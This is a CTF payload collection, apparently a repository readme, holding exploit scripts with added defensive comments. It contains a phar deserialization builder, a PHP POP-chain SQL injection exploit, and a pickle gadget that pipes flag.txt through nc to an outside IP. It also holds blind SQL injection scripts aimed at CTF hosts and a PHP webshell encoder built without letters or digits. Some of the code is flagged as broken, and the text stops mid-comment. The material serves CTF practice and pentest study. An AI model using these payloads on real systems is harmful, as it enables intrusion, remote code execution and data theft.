Payloads All in One
A collection of payloads and exploit scripts used in CTF games, which may also be useful for pentesting.
Serialize/Unserialize
phar
<?php
/**
 * Minimal carrier class whose serialized form ends up in the phar manifest.
 * It declares a single public string property and nothing else; the
 * serialized representation is identical to the original `var` declaration.
 */
class Flag
{
    public $output = "";
}
// Build the object whose serialized form is stored in the phar manifest.
// NOTE(review): `test` is not declared in this snippet; the only class above is Flag.
$a = new test();
$a->output = "system('cat /flag');";
// Layout for generating the phar file.
// Defensive context: setMetadata() stores a serialized PHP object in the archive;
// the phar:// deserialization technique relies on that metadata being
// unserialized when the archive is later opened through the phar:// wrapper
// (PHP 8 reportedly changed when this happens - confirm for the version in use).
// Mitigations on the receiving side: never pass user-controlled paths to file
// functions, reject the phar:// wrapper, and check uploads by content, not extension.
@unlink("phar.phar");
$phar = new Phar("phar.phar"); // the extension must be .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub
$phar->setMetadata($a); // store the custom metadata in the manifest
$phar->addFromString("test.txt", "test"); // add the file to be archived
// the signature is computed automatically
$phar->stopBuffering();
other
<?php
/****************** pop 链, 目的就是获得admin 的密码,然后登陆得到flag
* link: http://119.23.206.8/index.php/archives/90/
* update.php 中,调用了User类中的 update方法,而lib.php 中的update方法中存在反序列化,反序列化的内容为getnewInfo方法
* safe(serialize(new Info($age,$nickname)));,而这个方法返回值是将post的参数age 和 nickname 作为info类的初始化对象,跟进这个类
* Info 类中存在__call 魔法函数,同样的在User类中存在_toString 魔法函数,调用了update方法,该方法是info 类中没有的,那么就让nickname 为
* info 类去触发__Call 魔法函数。如何触发__toString方法呢?
* 在Updaehelper 类中可以看到,这里直接将sql 当作字符串输出。如果sql 为User 类,那么就回触发__toString方法,然后让nickname 为info类,就会触发__call 魔法函数
* public function __destruct()
{
echo $this->sql;
}
* __call 是这样的 echo $this->CtrlCase->login($argument[0]); 调用了 login 方法 和 CtrlCase ,如果Ctrlcase 为 dbCtrl 然后就可以执行任意sql 语句了。
*
*
*
*/
error_reporting(0); // suppress all PHP diagnostics for the rest of the script
/**
 * Blacklist filter reproduced from the challenge: every listed keyword or
 * character found in $parm is replaced with the literal string 'hacker'.
 *
 * Defensive note: the replacement changes the length of the text, so running
 * it over an already-serialized string desynchronises the embedded length
 * prefixes (the "string escape" the original comment alludes to). Filter
 * before serializing, or re-serialize after filtering - never filter the
 * serialized form itself.
 *
 * @param string|string[] $parm value handed straight to str_replace()
 * @return string|string[] the filtered value
 */
function safe($parm)
{
    $blacklist = [
        'union', 'regexp', 'load', 'into', 'flag', 'file', 'insert',
        "'", '\\', '*', 'alter',
    ];
    $replacement = 'hacker';

    return str_replace($blacklist, $replacement, $parm);
}
//$a = "union select password,nickename from users where username = 'admin'";
//$b = safe(serialize($a));
//echo $b;
/**
 * Gadget class from the challenge: __call() forwards any undefined method
 * call to $this->CtrlCase->login(). In the driver code below the CtrlCase
 * property is overwritten with other objects, which is what links the chain.
 */
class Info
{
    public $age;
    public $nickname;
    public $CtrlCase;

    public function __construct()
    {
        $this->CtrlCase = new dbCtrl(); // final part of the chain: executes the SQL statement
    }

    // Invoked for any method Info does not define (update() in User::__toString).
    // NOTE(review): the body reads $argument while the parameter is $arguments.
    public function __call($name, $arguments)
    {
        echo $this->CtrlCase->login($argument[0]);
    }
}
/**
 * Gadget class: using a User in string context calls update() on its
 * nickname with the age string as the only argument. With an Info as the
 * nickname, that call goes through Info::__call().
 */
class User
{
    public $id;
    public $age=null;
    public $nickname=null;

    public function __construct()
    {
        $this->nickname = new Info(); // original note: triggers __toString
        $this->age = 'select a,1 from where a!=? limit 1';
    }

    // Runs when the object is echoed, e.g. by UpdateHelper::__destruct().
    // It does not return a value.
    public function __toString()
    {
        $this->nickname->update($this->age);
    }
}
/**
 * Gadget class and entry point of the chain: the destructor echoes $sql, so
 * whatever object is stored there is converted to a string when the
 * UpdateHelper is destroyed.
 */
class UpdateHelper
{
    public $id;
    public $newinfo;
    public $sql;

    public function __construct()
    {
        $sql = new User(); // NOTE(review): assigns a local, not $this->sql; the driver code sets the property explicitly
    }

    public function __destruct()
    {
        echo $this->sql;
    }
}
/**
 * Property-only copy of the challenge's database controller. Only the public
 * properties are reproduced because they determine the serialized form; the
 * login() method referenced by Info::__call() is not defined in this file.
 */
class dbCtrl
{
    public $hostname="127.0.0.1";
    public $dbuser="root";
    public $dbpass="root";
    public $database="test";
    public $name;
    public $password;
    public $mysqli;
    public $token;
}
// Assemble the chain: Info -> UpdateHelper (__destruct) -> User (__toString)
// -> Info (__call) -> dbCtrl. The first serialize() below prints the baseline
// string; the nickname is then overwritten with a pre-built fragment that,
// after safe() lengthens 'flag' and '*' into 'hacker', no longer matches the
// declared string length (the escape noted at safe()).
// Defensive take-away: the root cause is unserialize() on user-influenced data
// that was filtered after serialization; use a data format such as JSON and
// validate before serializing, not after.
$info = new Info();
$info->age = '';
$info->nickname = '';
$info->CtrlCase = new UpdateHelper();
$info->CtrlCase->sql = new User();
$info->CtrlCase->sql->age = "select password,\"c4ca4238a0b923820dcc509a6f75849b\" from user where username=? or 1=1 limit 1";
$info->CtrlCase->sql->nickname->CtrlCase = new dbCtrl();
echo serialize($info);
$info->nickname = 'flag**********************************************************************************************";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:92:"select password,"c4ca4238a0b923820dcc509a6f75849b" from user where username=? or 1=1 limit 1";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";N;s:8:"password";i:1;s:6:"mysqli";N;s:5:"token";N;}}}}}';
// Apply the challenge's filter to the serialized object and feed the result
// back to unserialize(), which is what the vulnerable update path does.
$e = safe(serialize($info));
echo $e;
unserialize($e);
pickle
import pickle
import pickletools
import base64
import os
class Test(object):
    """Pickle gadget: __reduce__ makes pickle emit a call to os.system with the
    given shell string, which the unpickler executes while loading.

    Defensive note: this is why pickle.loads() must never see untrusted bytes;
    use JSON for untrusted input, or restrict Unpickler.find_class.
    """
    def __reduce__(self):
        return (os.system,('nc 174.1.142.80 2333 < flag.txt',))
# Dump the gadget, print it base64-encoded, and disassemble the opcodes
# (pickletools.dis shows the REDUCE ('R') opcode that performs the call).
test = Test()
print(base64.b64encode(pickle.dumps(test)))
pickletools.dis(pickle.dumps(test))
pickle without R
思路:
利用c 这个指令码进行全局变量包含
硬编码
b 指令码
比较贴近底层,压栈啥的,不是很好理解。等有能力再来补充。
SQL injection
error based
结合宽字节
-2%df' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
blind injection
时间盲注
import requests
# Time-based blind injection driver: recovers the database name one character
# at a time by asking the server to sleep when the guess is right.
# Detection hint: bursts of near-identical requests differing in one character
# and containing sleep()/if() in a query parameter. Mitigation: parameterized
# queries; the sort parameter here is interpolated into SQL.
url = 'http://d84fc07c-0e57-40c5-b34b-5fb7a8970774.node3.buuoj.cn/Less-49/?sort='
res = ''
chars = 'qwertyuiopasdfghjklzxcvbnm_1234567890@'
for j in range(1, 10):
    #for k in range(32, 127):
    for k in chars:
        # print(k)
        payload = "1' and if(substr((select database()),{},1)='{}',sleep(1),null) --+".format(j, k)
        r = requests.get(url + payload)
        print(r.url)
        print(r.elapsed.total_seconds())
        # Threshold on the response time; as written both operands are strings.
        if str(r.elapsed.total_seconds()) > str(13):
            res += k
            print(res)
            break
print('database is :' + res)
布尔型盲注
import requests
# Boolean-based blind injection driver: the page text 'You are in' acts as
# the oracle for each (position, character code) guess.
# Mitigation: parameterized queries for the id parameter; the oracle string
# also disappears once responses no longer differ on query success.
url = 'http://ed20f151-e439-4f27-96bc-e0c7029a8366.node3.buuoj.cn/Less-8/?id='
res = ''
for j in range(1,10):
    for k in range(33, 127):
        payload = "1' and (ascii(substr((select database()),{},1)))={} --+".format(j, k)
        r = requests.get(url=url+payload)
        # print(r.url)
        print(r.url)
        if 'You are in' in r.text:
            res += chr(k)
            print(res)
            break
print(res)
# import time
# import requests
#
# url = "http://eci-2zedu9owieapit2qqdff.cloudeci1.ichunqiu.com/index.php"
# result = []
#
# for k in range(1, 20):
# for i in range(65, 126):
# payload = {"username": "admin\\", 'password': '||/**/greatest(ord(left(password,' + str(k) + ',1))' + str(i) + ')#'}
# req = requests.post(url=url, data=payload)
# if "账号或密码错误" in req.text:
# print(chr(i))
# result.append(chr(i))
# print(result)
# break
# print(result, end='')
import requests
import time
# Blind injection via a login form: the password field carries a REGEXP
# anchored prefix ('^' + known prefix + candidate), sent as a 0x-prefixed hex
# literal, and the word 'flag' in the response is the oracle.
# Mitigation: bind the username/password values instead of building the
# query; the trailing backslash in 'admin\\' is what escapes the quote here.
url = "http://eci-2zea89kqieujhhope4wn.cloudeci1.ichunqiu.com/"
name = ""
s = "qweratyuiopsdfghjklzxcvbnm_}{0123456789QWERATYUIOPSDFGHJKLZXCVBNM.-"
for i in range(1, 300):
    for j in s:
        z = name + j
        zz = '^' + z
        by = bytes(zz, 'UTF-8')
        zzz = by.hex()
        zzzz = '0x' + zzz
        payload = "or/**/password/**/regexp/**/{}#".format(zzzz)
        data = {
            'username': 'admin\\',
            'password': payload
        }
        r = requests.post(url, data=data)
        print(payload)
        if "flag" in r.text:
            name += j
            print(name)
            break
    # Placement inferred from the flattened original: stop once no candidate
    # extended the name (r holds the last response of the inner loop).
    if "flag" not in r.text:
        print(name)
        break
XSS
CSRF\CSS Injection
css injection poc:
逐字符猜解csrf-token
当然这需要目标站点x-frame-options
未被禁用。
那iframe被禁用了,还有办法注入吗。
相关工具:
upload webshell bypass
No num or alp Webshell/RCE
phpinfo
(AQAQVQV^trim(((((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i)))+((!!@i)))))();
<?php
// author: https://www.anquanke.com/post/id/207492
error_reporting(0); // suppress diagnostics (the table below deliberately uses 0/0 and 1/0)
$_00 = '((0).(0)){0}&((0/0).(1)){1}';//0000 0000
$_10 = '((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))';//0001 0000
$_20 = '(((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1})';//0010 0000 space
$_21 = '(((1).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0001 !
$_22 = '(((2).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0010 "
$_23 = '(((3).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0011 //
$_24 = '(((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3})';//0010 0100 $
$_25 = '(((5).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0101 %
$_26 = '(((6).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0110 &
$_27 = '(((7).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0111 '
$_28 = '(((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 1000 (
$_29 = '(((9).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 1001 )
$_2a = '((((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))|((((2).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1010 *
$_2b = '((9999999999*999999999).(0)){12}';//0010 1011 +
$_2c = '((((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3}))|((((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1100 ,
$_2d = '((((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3}))|((((9).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1101 -
$_2e = '((3333/4).(0)){3}';//0010 1110 .
$_2f = '((3333/4).(0)){3}|((9999999999*999999999).(0)){12}';//0010 1111 /
$_30 = '((0).(0)){0}';//0011 0000 0
$_31 = '((1).(0)){0}';//0011 0001 1
$_32 = '((2).(0)){0}';//0011 0010 2
$_33 = '((3).(0)){0}';//0011 0011 3
$_34 = '((4).(0)){0}';//0011 0100 4
$_35 = '((5).(0)){0}';//0011 0101 5
$_36 = '((6).(0)){0}';//0011 0110 6
$_37 = '((7).(0)){0}';//0011 0111 7
$_38 = '((8).(0)){0}';//0011 1000 8
$_39 = '((9).(0)){0}';//0011 1001 9
$_3a = '(((8).(0)){0})|(((2).(0)){0})';//0011 1010 :
$_3b = '(((8).(0)){0})|(((3).(0)){0})';//0011 1011 ;
$_3c = '(((8).(0)){0})|(((4).(0)){0})';//0011 1100 <
$_3d = '(((8).(0)){0})|(((5).(0)){0})';//0011 1101 =
$_3e = '(((8).(0)){0})|(((6).(0)){0})';//0011 1110 >
$_3f = '(((8).(0)){0})|(((7).(0)){0})';//0011 1111 ?
$_40 = '((0/0).(1)){1}&((0/0).(1)){0}';//0100 0000 @
$A = '((0/0).(1)){1}';//0100 0001 A
$B = '(((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))';//0100 0010 B
$C = '((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))';//0100 0011 C
$D = '(((0/0).(1)){0}&((9999999999*999999999).(0)){11})';// 0100 0100 D
$E = '((9999999999*999999999).(0)){11}';//0100 0101 E
$F = '(((1/0).(0)){2})';//0100 0110 F
$G = '(((0/0).(1)){1})|(((1/0).(0)){2})';//0100 0111 G
$H = '((((1/0).(0)){0})&((0/0).(1)){0})';//0100 1000 H
$I = '(((1/0).(0)){0})';//0100 1001 I
$J = '((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1010 J
$K = '(((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1011 K
$L = '((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1100 L
$M = '((((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1101 M
$N = '((0/0).(1)){0}';//0100 1110 N
$O = '((0/0).(1)){1}|((0/0).(1)){0}';//0100 1111 O
$P = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1}&((0/0).(1)){0})';//0101 0001 P
$Q = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1})';//0101 0001 Q
$R = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0})))';//0101 0010 R
$S = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0})))))';//0101 0011 S
$T = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((0/0).(1)){0}&((9999999999*999999999).(0)){11}))';//0101 0100 T
$U = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((9999999999*999999999).(0)){11})';//0101 0101 U
$V = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((1/0).(0)){2}))';//0101 0110 V
$W = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((0/0).(1)){1})|(((1/0).(0)){2}))';//0101 0111 W
$X = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((1/0).(0)){0})&((0/0).(1)){0}))';//0101 1000 X
$Y = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((1/0).(0)){0}))';//0101 1001 Y
$Z = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1010 Z
$_5b = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1011 [
$_5c = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1100
$_5d = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1101 ]
$_5e = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){0})';//0101 1110 ^
$_5f = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1}|((0/0).(1)){0})';//0101 1111 _
$_60 = '(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0110 0000 `
$a = '(((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1}';//0110 0001 a
$b = '(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1})';//0110 0010 b
$c = '((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))|((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0011 c
$d = '(((3333/4).(0)){3}|((0/0).(1)){1})&(((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0110 0100 d
$e = '((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})|(((9999999999*999999999).(0)){11})';//0110 0101 e
$f = '(((6).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0110 f
$g = '(((0/0).(1)){1}|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0111 g
$h = '(((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 1000 h
$i = '(((0/0).(1)){1}|((0).(9)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 1001 i
$j = '(((9999999999*999999999).(0)){12}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0110 1010 j
$k = '((9999999999*999999999).(0)){12}|((0/0).(1)){1}';//0110 1011 k
$l = '((((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1}))|((((3333/4).(0)){3}|((0/0).(1)){1})&(((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))))';//0110 1100 l
$m = '((((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1}))|(((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})|(((9999999999*999999999).(0)){11}))';//0110 1101 m
$n = '((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})';//0110 1110 n
$o = '((3333/4).(0)){3}|((0/0).(1)){1}';//0110 1111 o
$p = '((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0000 p
$q = '((0).(0)){0}|((0/0).(1)){1}';//0111 0001 q
$r = '((2).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0010 r
$s = '((0/0).(1)){1}|((0).(2)){1}';//0111 0011
$t = '((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0100 t
$u = '((0/0).(1)){1}|((0).(4)){1}';//0111 0101
$v = '((6).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0110 v
$w = '((0/0).(1)){1}|((0).(6)){1}';//0111 0111
$x = '((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 1000 x
$y = '((0/0).(1)){1}|((0).(9)){1}';//0111 1001
$z = '((((9999999999*999999999).(0)){12}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))|(((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1010 z
$_7b = '(((1/0).(0)){0}|(((((-1).(0)){0})|(((0/0).(0)){1}))&((((1).(0)){0})|(((999**999).(1)){2}))))&((4).(0)){0}';//0111 1011 {
$_7c = '(((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))|((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1100 |
$_7d = '((1).(2)){1}|((1/0).(0)){0}';//0111 1101 }
$_7e = '(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})|((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1110 ~
$_7f = '(((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1}';//0111 1111 7f
$_80 = '(((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~((~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&((~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}))';//1000 0000
$_ff = '(~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}';//1111 1111 ff
$payload = 'system(end(getallheaders()))'; // put the payload here
$result = "";
$flag = True;
// Encoder: walk the payload byte by byte and emit, for each byte, the
// expression from the table above that evaluates to that character.
// Lower-case letters are looked up through the variable named after the
// letter ($a ... $z); every other byte through $_<hex>. Runs of letters are
// wrapped in one pair of parentheses and joined with '.', so each run becomes
// a single parenthesised string expression. $flag is true while no letter
// group is open.
// Defensive note: this is the standard demonstration that a blacklist on
// letters and digits does not stop code execution once input reaches an
